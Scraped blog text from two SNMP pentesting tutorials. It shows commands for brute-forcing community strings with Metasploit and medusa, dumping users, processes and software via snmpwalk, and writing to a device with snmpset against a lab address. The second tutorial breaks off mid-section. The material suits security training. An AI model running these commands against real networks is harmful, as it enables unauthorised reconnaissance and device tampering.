<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsMfqln4XXWVNW9wMLcSd_GqCiwx50X7rO4rPn4lDaQEkj8iFCCkDrI5m_UsKu8NqQhRX3SHLe-qKtP0wYRv5TjjtZdGLSLZx1habAZJZfktG2cvAsW10IcqXnfNRrAmAc6VEDo9AlzBo/s1600/Screen+Shot+2017-04-09+at+10.56.51+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="304" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsMfqln4XXWVNW9wMLcSd_GqCiwx50X7rO4rPn4lDaQEkj8iFCCkDrI5m_UsKu8NqQhRX3SHLe-qKtP0wYRv5TjjtZdGLSLZx1habAZJZfktG2cvAsW10IcqXnfNRrAmAc6VEDo9AlzBo/s640/Screen+Shot+2017-04-09+at+10.56.51+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The output is very massive, So i am redirecting the output to a text file.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both;">
<b>snmpwalk -v1 -c mike 192.168.131.135 > snmpout.txt</b></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoTMuOF6X3oGgOB_Pm5NbXVo28axfKmK_AS0LWv-Ap19H2flPrBdSns4i3kJtOd5gGUYlmWbZcPwZOPko3sM3czdwRqWgDTgbZvteSXSHz41pRBxAzm7lB-MUxnZp06-_oqJlcP2ZxFak/s1600/Screen+Shot+2017-04-09+at+11.03.57+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="54" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoTMuOF6X3oGgOB_Pm5NbXVo28axfKmK_AS0LWv-Ap19H2flPrBdSns4i3kJtOd5gGUYlmWbZcPwZOPko3sM3czdwRqWgDTgbZvteSXSHz41pRBxAzm7lB-MUxnZp06-_oqJlcP2ZxFak/s640/Screen+Shot+2017-04-09+at+11.03.57+PM.png" width="640" /></a></div>
<div>
<br /></div>
<div style="text-align: center;">
<b><br /></b></div>
As you can see below, we have tons of output. With some Many MIB Values.<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfCoRY9vSjEnNOnQm6JcqHxevNaPegL6J8x-P-umphjidI9GG9QtpbsudljySZRwxBi7hOHpRBuVJx6pwxL-XPkoEFp23HUexGt5VPH574Ch7F0Pe9QL5DbZx53qnEWv5-DfXwFPBxKBM/s1600/Screen+Shot+2017-04-09+at+11.12.49+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="322" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfCoRY9vSjEnNOnQm6JcqHxevNaPegL6J8x-P-umphjidI9GG9QtpbsudljySZRwxBi7hOHpRBuVJx6pwxL-XPkoEFp23HUexGt5VPH574Ch7F0Pe9QL5DbZx53qnEWv5-DfXwFPBxKBM/s640/Screen+Shot+2017-04-09+at+11.12.49+PM.png" width="640" /></a></div>
<br />
To do some specific search, we can use MIB values in snmpwalk .<br />
<br />
snmpwalk -c <Communitystring> –v1 192.168.11.204 <MIBValues><br />
<br />
<b>In our case community string is - mike</b><br />
<br />
<b>Extracting Windows Users:</b><br />
<br />
snmpwalk -c mike -v1 192.168.131.135 1.3.6.1.4.1.77.1.2.25<br />
<br />
<b>Extracting </b><b>Running Windows Processes:</b><br />
<b><br /></b>
snmpwalk ‐c mike ‐v1 192.168.131.135 1.3.6.1.2.1.25.4.2.1.2<br />
<b><br /></b>
<b>Extracting </b><b>Open TCP Ports:</b><br />
<b><br /></b>
snmpwalk ‐c mike ‐v1 192.168.131.135 1.3.6.1.2.1.6.13.1.3<br />
<b><br /></b>
<b>Extracting </b><b>Installed Software:</b><br />
<b><br /></b>
snmpwalk ‐c mike ‐v1 192.168.131.135 1.3.6.1.2.1.25.6.3.1.2<br />
<br />
<br />
<b><br />
Now we need to Verify whether this community strings "milke" is Writable or not.To do this we will use a another tool SNMPSET</b><br />
<br />
<b>snmpset -v1 -c mike 192.168.131.135 iso.3.6.1.2.1.1.5.0 s SomeOneWasHere</b></div>
<div>
<br /></div>
<div>
Here the value "<b>iso.3.6.1.2.1.1.5.0" </b>which have value "bhati"<b> </b>is picked from out snmpwalk output file.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpxQ82cxz2qaO2RgEMONtYF8p6a3zFMeBOMSTpvD093q4pwlAzzb1zgkWTcPwVeOxT17hCRFjikR2eNA3EZNUpvssh2sCF4ScFNQRasgceFtfyqdt3VZYzLAQpmrW2t_FCdrfxPolyGoE/s1600/Screen+Shot+2017-04-09+at+11.12.49+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="322" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpxQ82cxz2qaO2RgEMONtYF8p6a3zFMeBOMSTpvD093q4pwlAzzb1zgkWTcPwVeOxT17hCRFjikR2eNA3EZNUpvssh2sCF4ScFNQRasgceFtfyqdt3VZYzLAQpmrW2t_FCdrfxPolyGoE/s640/Screen+Shot+2017-04-09+at+11.12.49+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
This <b>snmpset -v1 -c mike 192.168.131.135 iso.3.6.1.2.1.1.5.0 s SomeOneWasHere </b>command will go ahead and change the value from "bhati" to "SomeOneWasHere" in SNMP. Lets try this.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Our command succeed.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcHdHGv3692CJSQHlaRwER3UjB6nqY4zy26RUOXYrkHr-reL3PvRa8DYwqWyBy7qA0HcpvtbIR7iUwCkAUFQ97zhG5N0BZn4MQpUSjj39v2EbCt8TNUJsTGN7Y9ZIxRWLS39nTsQt-B7k/s1600/Screen+Shot+2017-04-09+at+11.18.28+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="68" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcHdHGv3692CJSQHlaRwER3UjB6nqY4zy26RUOXYrkHr-reL3PvRa8DYwqWyBy7qA0HcpvtbIR7iUwCkAUFQ97zhG5N0BZn4MQpUSjj39v2EbCt8TNUJsTGN7Y9ZIxRWLS39nTsQt-B7k/s640/Screen+Shot+2017-04-09+at+11.18.28+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Now lets Re-Scan our SNMP Target using SNMPWALK</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
As you can see below, The value has been changed to "SomeOneWasHere".</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJqC7VPyP0NPxn1Nt5j5RgX2W_pXjRGje1KireqYu3uuGg8evzebY9Wgjj-Gb9L4CkhoYh7vhNbgLron8UONxQqKASvVnT6kkPkMNXsi58Zf62FImc04G4ui665jFDQizePCkFbTOiY7o/s1600/Screen+Shot+2017-04-09+at+11.19.39+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="304" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJqC7VPyP0NPxn1Nt5j5RgX2W_pXjRGje1KireqYu3uuGg8evzebY9Wgjj-Gb9L4CkhoYh7vhNbgLron8UONxQqKASvVnT6kkPkMNXsi58Zf62FImc04G4ui665jFDQizePCkFbTOiY7o/s640/Screen+Shot+2017-04-09+at+11.19.39+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Now we are confirm that, Our Community String "mike" is Have Write Properties.Now we should move to Next Part of Dumping Some Meal from target machine.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>B) SNMPCHECK</b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
<b>snmpcheck </b>tools will uncovered the Important Information of target machine using the community strings "mike" which we have found.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>snmpcheck.rb -c mike 192.168.131.135</b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
If you got error while running this command, please see help section of snmpcheck followed by -h, Your version might be older or newer.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhS9tLaisMTBmORAj5uIcFrgh5wdPPoH6ENQRD_hF6IUjsTh5vG6rd-A6rnSrKgFNnwgyYIrwOlfngSu4xkgHSsQzFAi5gRVTCWyqtZzeGAIpJ_pC0mDClY4ltlSBa-gmYbQSTBoPHMjxM/s1600/Screen+Shot+2017-04-09+at+11.40.43+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="424" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhS9tLaisMTBmORAj5uIcFrgh5wdPPoH6ENQRD_hF6IUjsTh5vG6rd-A6rnSrKgFNnwgyYIrwOlfngSu4xkgHSsQzFAi5gRVTCWyqtZzeGAIpJ_pC0mDClY4ltlSBa-gmYbQSTBoPHMjxM/s640/Screen+Shot+2017-04-09+at+11.40.43+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>C) Metasploit</b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
We can achieve the same information using metasploit auxiliaries.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>auxiliary/scanner/snmp/snmp_enum</b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
Fill the required value.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgp5qePAjn9iIynpY6YiAbg_9OKNYGCqgnxYNxXeaAfuC6fyaiE_PIs7ZjXgza521hUgqkSvhPNeE88vtcI4hHCiTGzYY-0kbMGjivMqofGBxgnOWo9VBrb0HiXj48baUqee26arN1LU9M/s1600/Screen+Shot+2017-04-09+at+11.47.17+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="284" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgp5qePAjn9iIynpY6YiAbg_9OKNYGCqgnxYNxXeaAfuC6fyaiE_PIs7ZjXgza521hUgqkSvhPNeE88vtcI4hHCiTGzYY-0kbMGjivMqofGBxgnOWo9VBrb0HiXj48baUqee26arN1LU9M/s640/Screen+Shot+2017-04-09+at+11.47.17+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
Now just hit "run" and you will see tons of Meal from our target machine.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUwBISlctcxf729eCy8SIhlGpKFZaTxupKzP143FarZ_mPSO3apxGfkgXqnbGuZ5Sji3Mmc2WRIxtKYEV6NpUlZXf11HMMOagQ0VeUYYyFyqyN82bfLlzLo2XMvBFqup3t4YbVOjvgOd8/s1600/Screen+Shot+2017-04-09+at+11.48.10+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="598" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUwBISlctcxf729eCy8SIhlGpKFZaTxupKzP143FarZ_mPSO3apxGfkgXqnbGuZ5Sji3Mmc2WRIxtKYEV6NpUlZXf11HMMOagQ0VeUYYyFyqyN82bfLlzLo2XMvBFqup3t4YbVOjvgOd8/s640/Screen+Shot+2017-04-09+at+11.48.10+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifZpLDmUzhB3eDKs_OXzexKr2SIok5m-jkcKd-LojT4Szd_-kynE_Q0Xfcu1wAmCoarmtRsQj3Zu-cyh5nSo6KxZVGXfb-waX4hBALU9gemFylguqqkFHGI-uHKmbLYNrBBIVjTDvPcsY/s1600/Screen+Shot+2017-04-09+at+11.48.27+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifZpLDmUzhB3eDKs_OXzexKr2SIok5m-jkcKd-LojT4Szd_-kynE_Q0Xfcu1wAmCoarmtRsQj3Zu-cyh5nSo6KxZVGXfb-waX4hBALU9gemFylguqqkFHGI-uHKmbLYNrBBIVjTDvPcsY/s640/Screen+Shot+2017-04-09+at+11.48.27+PM.png" width="640" /></a><br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div>
<br /></div>
<div style="text-align: center;">
<br /></div>
</div>
Narendra Bhatihttp://www.blogger.com/profile/15834240919754131768noreply@blogger.com0tag:blogger.com,1999:blog-3462277729309057123.post-38722817281436083592017-04-10T00:23:00.000+05:302017-04-11T16:37:36.754+05:30Hacking SNMP Service Part 1 - The Post Exploitation : Attacking Network - Network Pentesting<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: Times; font-size: medium; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: normal; letter-spacing: normal; orphans: 2; text-align: center; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
</div>
<br />
<div style="text-align: left; text-indent: 0px;">
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4faJH4HPssPfJiG9vSDERsFxCt-zCIizxckjGdJA0E58xD7Dcb89gfiiv-sJPQmgGhDzQvhk2qsGm97iWgfRDvDJ3tQb7YeJa4BkO3Lu3r9Z_u49fWeBB-ZQjgUshz3FxRAr6qQuxoGI/s1600/Screen+Shot+2017-04-09+at+10.51.11+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="190" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4faJH4HPssPfJiG9vSDERsFxCt-zCIizxckjGdJA0E58xD7Dcb89gfiiv-sJPQmgGhDzQvhk2qsGm97iWgfRDvDJ3tQb7YeJa4BkO3Lu3r9Z_u49fWeBB-ZQjgUshz3FxRAr6qQuxoGI/s640/Screen+Shot+2017-04-09+at+10.51.11+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: center; text-transform: none; white-space: normal; word-spacing: 0px;">
<b><br /></b></div>
<h2 style="clear: both; margin: 0px; text-align: center;">
<span style="font-family: "times";"><b>Hacking SNMP Service Part 1 - The Post Exploitation : Attacking Network - Network Pentesting</b></span></h2>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<b><br /></b></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<b>SNMP (Simple Network Management Protocol)</b></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<b><br /></b></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<span style="background-color: white; color: #222222; font-family: "arial" , sans-serif; font-size: 16px;">Simple Network Management Protocol (</span><b style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 16px;">SNMP</b><span style="background-color: white; color: #222222; font-family: "arial" , sans-serif; font-size: 16px;">) is a popular protocol for network management. It is used for collecting information from, and configuring, network devices, such as servers, printers, hubs, switches, and routers on an Internet Protocol (IP) network.</span></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<span style="background-color: white; color: #222222; font-family: "arial" , sans-serif; font-size: 16px;"><br /></span></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<span style="background-color: white; color: #222222; font-family: "arial" , sans-serif; font-size: 16px;">With lots of usability, SNMP can be used by an attacker to compromise the services and IT infrastructure as well. which will cover later.</span></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<span style="background-color: white; color: #222222; font-family: "arial" , sans-serif; font-size: 16px;"><br /></span></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<span style="font-weight: normal;">Now we will see how </span><b>we can brute force the SNMP Services Community Strings.</b></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<b><br /></b></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<b><br /></b></div>
<div class="separator" style="clear: both; font-family: times;">
<span style="background-color: white; color: #222222; font-family: "arial" , sans-serif; font-size: 16px;"><b>But Why Crack SNMP Community Strings</b></span></div>
<div class="separator" style="clear: both; font-family: times;">
<span style="background-color: white; color: #222222; font-family: "arial" , sans-serif; font-size: 16px;"><b><br /></b></span></div>
<div class="separator" style="clear: both; font-family: times;">
<span style="background-color: white; color: #222222; font-family: "arial" , sans-serif; font-size: 16px;"><span style="color: #333333; font-family: "hind vadodara" , sans-serif; font-size: 14px;">The SNMP Read-Only Community String is like a user id or password. It is sent along with each SNMP Get-Request and allows (or denies) access to a router's or other device's statistics. If the community string is correct, the device responds with the requested information. If the community string is incorrect, the device simply ignores the request and does not respond.</span></span></div>
<div class="separator" style="clear: both; font-family: times;">
<span style="background-color: white; color: #222222; font-family: "arial" , sans-serif; font-size: 16px;"><span style="color: #333333; font-family: "hind vadodara" , sans-serif; font-size: 14px;"><br /></span></span></div>
<div class="separator" style="clear: both; font-family: times;">
<span style="background-color: white; color: #222222; font-family: "arial" , sans-serif; font-size: 16px;"><span style="color: #333333; font-family: "hind vadodara" , sans-serif; font-size: 14px;"><br /></span></span></div>
<div style="clear: both; text-align: left;">
<span style="color: #333333; font-family: "hind vadodara" , sans-serif; font-size: small;"><span style="background-color: white;"><b>What We Can Do By Community Strings.</b></span></span></div>
<div class="separator" style="clear: both;">
<span style="color: #333333; font-family: "hind vadodara" , sans-serif;"><span style="background-color: white; font-size: 14px;"><b><br /></b></span></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "times";">Default community strings are "public" & "private" with "ro" (Read Only) & "rw" (Read & Write).</span></div>
<div class="separator" style="clear: both;">
As it clear indicates, that Read only means user can only read the information & Read and Write means user can write/update the information present in SNMP.</div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
</div>
<a name='more'></a><br />
<br />
<div class="separator" style="clear: both;">
<b>What Is MIB in SNMP</b></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
The SNMP Management Information Base (MIB) is a database containing information</div>
<div class="separator" style="clear: both;">
usually related to network management. The database is organized like a tree, where</div>
<div class="separator" style="clear: both;">
branches represent different organizations or network functions. The leaves of the tree</div>
<div class="separator" style="clear: both;">
(final endpoints) correspond to specific variable values that can then be accessed, and</div>
<div class="separator" style="clear: both;">
probed, by an external user. To read more about the MIB tree, refer to the following</div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<a href="http://publib.boulder.ibm.com/infocenter/pseries/v5r3/index.jsp?topic=/com.ibm.">http://publib.boulder.ibm.com/infocenter/pseries/v5r3/index.jsp?topic=/com.ibm.</a></div>
<div class="separator" style="clear: both;">
</div>
<div class="separator" style="clear: both;">
<a href="http://aix.progcomm/doc/progcomc/mib.htm">aix.progcomm/doc/progcomc/mib.htm</a></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both; font-family: times;">
<br /></div>
<div class="separator" style="clear: both; font-family: times;">
<br /></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
Hence SNMP is running in UDP port, Don`t forgot to perform to A UDP Based Scan in Network Pentest.</div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<b>A) Metasploit</b></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<b><br /></b></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
For SNMP use <b>auxiliary/scanner/snmp/snmp_login </b></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<b><br /></b></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: center; text-transform: none; white-space: normal; word-spacing: 0px;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAKquiNtAl9p_XgeNgnHefYiM9eSb5ROzjY_Lcb1VT6VuSIAt3doyBcqpVoiM5PBmKq9bVKWoWsOYg7agZBd6fS4Uf4AlH35EUyIWwqtLfR6_iJCWBxqzahtaonFfKJmr9viYgxnW6pqI/s1600/Screen+Shot+2017-04-09+at+6.46.36+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="276" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAKquiNtAl9p_XgeNgnHefYiM9eSb5ROzjY_Lcb1VT6VuSIAt3doyBcqpVoiM5PBmKq9bVKWoWsOYg7agZBd6fS4Uf4AlH35EUyIWwqtLfR6_iJCWBxqzahtaonFfKJmr9viYgxnW6pqI/s640/Screen+Shot+2017-04-09+at+6.46.36+PM.png" style="cursor: move;" width="640" /></a></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: center; text-transform: none; white-space: normal; word-spacing: 0px;">
<b><br /></b></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
Set the following Parameters and hut <b style="font-weight: normal;">run </b>and you can see Metasploit has succeed in SNMP Community String is "<b>mike</b>" .</div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: center; text-transform: none; white-space: normal; word-spacing: 0px;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1cwxBHmfwqN_woXggjaq9AHwBJluYOW0wAVTvzf8x9lvLxwhOHLjVdPYyjfLeY_DNVyvifD-j0Q27tJruxCt7GhH4oD2cWrgwK5Rr6qnbLOHKErtBYLc-fk7Vn-pIR0RcEQUgpSwq-bw/s1600/Screen+Shot+2017-04-09+at+6.51.10+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="194" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1cwxBHmfwqN_woXggjaq9AHwBJluYOW0wAVTvzf8x9lvLxwhOHLjVdPYyjfLeY_DNVyvifD-j0Q27tJruxCt7GhH4oD2cWrgwK5Rr6qnbLOHKErtBYLc-fk7Vn-pIR0RcEQUgpSwq-bw/s640/Screen+Shot+2017-04-09+at+6.51.10+PM.png" style="cursor: move;" width="640" /></a></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<div style="color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
Personally, i will recommend Metasploit To SNMP Community String Crack . Because its take less time as compare to other tools.</div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<b>B) Medusa</b></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<b><br /></b></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
As medusa has great speed, Its also very useful to crack SNMP Strings.</div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<b><br /></b></div>
<div class="separator" style="clear: both; margin: 0px; text-align: left;">
<span style="font-family: "times";"><b>medusa -h 192.168.131.135 -u admin -P Desktop/demo/wordlist -M snmp</b></span></div>
<div class="separator" style="clear: both; margin: 0px; text-align: left;">
<span style="font-family: "times";">Here no user of "-u admin" but Medusa required this value so we are giving it fulfilled the requirement.</span></div>
<div class="separator" style="clear: both; text-align: center;">
